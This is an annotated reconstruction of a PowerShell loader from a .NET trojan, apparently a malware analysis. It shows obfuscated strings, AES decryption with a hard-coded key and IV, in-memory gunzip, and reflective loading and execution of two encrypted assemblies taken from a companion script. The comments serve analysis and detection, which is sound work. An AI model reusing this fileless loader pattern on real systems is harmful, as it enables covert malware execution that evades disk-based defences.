.NET trojan based on PowerShell, batch and .NET — loader reconstructed
# Deobfuscate strings
# Helper scriptblock: base64 text -> UTF-8 string. Not referenced anywhere later in this reconstruction.
$DecodeBase64 = {param($in) [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($in))}
# String-splitting obfuscation: stripping the 'ldVH' filler leaves 'GetCurrentProcess'; the Split('|')
# then yields a one-element array. Also unused below — the loader calls GetCurrentProcess directly.
$YdDd = 'GldVHetldVHCurldVHreldVHntPldVHroldVHceldVHssldVH'.Replace('ldVH', '').Split('|')
# Deobfuscate function names
# The original sample used random five-letter names for its two helpers; they are kept here as
# variables so the declarations and calls below can be written as ${DecryptAES} / ${DecompressGzip}.
# NOTE(review): whether PowerShell actually resolves `function ${DecryptAES}` to a function named
# 'ccbSO' is not settled by this snippet — read the listing as a readable reconstruction rather
# than a guaranteed-runnable script.
$DecryptAES = 'ccbSO'
$DecompressGzip = 'FYIcv'
# Functions to decrypt and decompress code
# Decrypts one payload with AES-CBC/PKCS7 under a key and IV embedded verbatim in the script.
# Both values are static base64 literals (32-byte key, 16-byte IV), so the payloads can be
# recovered offline from the script alone — no network fetch, key exchange or victim-specific
# derivation is involved, which is what makes static analysis of this sample straightforward.
# $payload: raw ciphertext bytes. Returns the plaintext bytes (still gzip-compressed at this stage;
# the caller passes the result to the gunzip helper).
function ${DecryptAES}($payload){
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7   # padding is stripped by TransformFinalBlock
$aes.Key = [System.Convert]::FromBase64String('34lAyVlbw77ON9xSh1j1eo4jVjfrXHRRypmTO1BVv5U=')   # 44 base64 chars -> 32 bytes (AES-256), hard-coded
$aes.IV = [System.Convert]::FromBase64String('sclHJpu2svJEHkdRgZJIug==')   # 24 base64 chars -> 16 bytes; the same IV is reused for every payload
$decryptor = $aes.CreateDecryptor()
$result = $decryptor.TransformFinalBlock($payload, 0, $payload.Length)   # single-shot decrypt of the whole buffer
$decryptor.Dispose()
$aes.Dispose()
return $result
}
# Gunzips a byte buffer entirely in memory; no temporary file is written.
# $payload: gzip-compressed bytes. Returns the decompressed bytes.
function ${DecompressGzip}($payload){
$ms = New-Object System.IO.MemoryStream ,$payload   # read side over the input buffer (leading comma passes the array as one ctor argument)
$out = New-Object System.IO.MemoryStream            # write side, grows as data is inflated
$gzip = New-Object System.IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
$gzip.CopyTo($out)
$gzip.Dispose()
$ms.Dispose()
$out.Dispose()
# ToArray is called after Dispose; MemoryStream.ToArray is documented to work on a closed stream,
# so the full decompressed buffer is still returned.
return $out.ToArray()
}
# Read in script containing encrypted payloads
# Resolve the directory of the *host process* executable (MainModule of the current process),
# not the directory of this script; script.ps1 is therefore expected to sit beside whatever
# .exe launched the loader.
$scriptPath = [System.IO.Path]::GetDirectoryName([System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName)
# The companion script is read as raw bytes, not executed: it acts as a carrier for the two
# encrypted blobs.
$script = [System.IO.File]::ReadAllBytes("$scriptPath\script.ps1")
# Decrypt and decompress payloads
# Extraction of each base64 blob from $script. The Aggregate call with seeds 5 and 6 and a
# one-parameter scriptblock reads as an approximate reconstruction of the original extractor
# (Aggregate expects a two-argument accumulator, and $script is a byte array rather than a
# string — TODO confirm against the original sample). The intended net effect is
# payload N = gunzip(aes_decrypt(base64decode(blob N))).
$payload1 = ${DecompressGzip} ( ${DecryptAES} ( [System.Convert]::FromBase64String(
[System.Linq.Enumerable]::Aggregate($script,5, {param($s) $s.Substring(2)})) ))
$payload2 = ${DecompressGzip} ( ${DecryptAES} ( [System.Convert]::FromBase64String(
[System.Linq.Enumerable]::Aggregate($script,6, {param($s) $s.Substring(2)})) ))
# Load payloads into memory and execute
# Both assemblies are loaded from byte[] and run via EntryPoint.Invoke — fully in memory, nothing
# is dropped to disk. For detection: this is the reflective Assembly.Load pattern that PowerShell
# script-block logging and AMSI / ETW .NET assembly-load telemetry surface, and the static AES
# key/IV in the helper above let an analyst decrypt and inspect both blobs without running them.
[System.Reflection.Assembly]::Load([byte[]]$payload1).EntryPoint.Invoke($null, $null)
[System.Reflection.Assembly]::Load([byte[]]$payload2).EntryPoint.Invoke($null, $null)
# Payloads appear to contain .NET assemblies that are reflectively loaded and executed
# Likely malicious implants/backdoors masked as benign scripts (edited)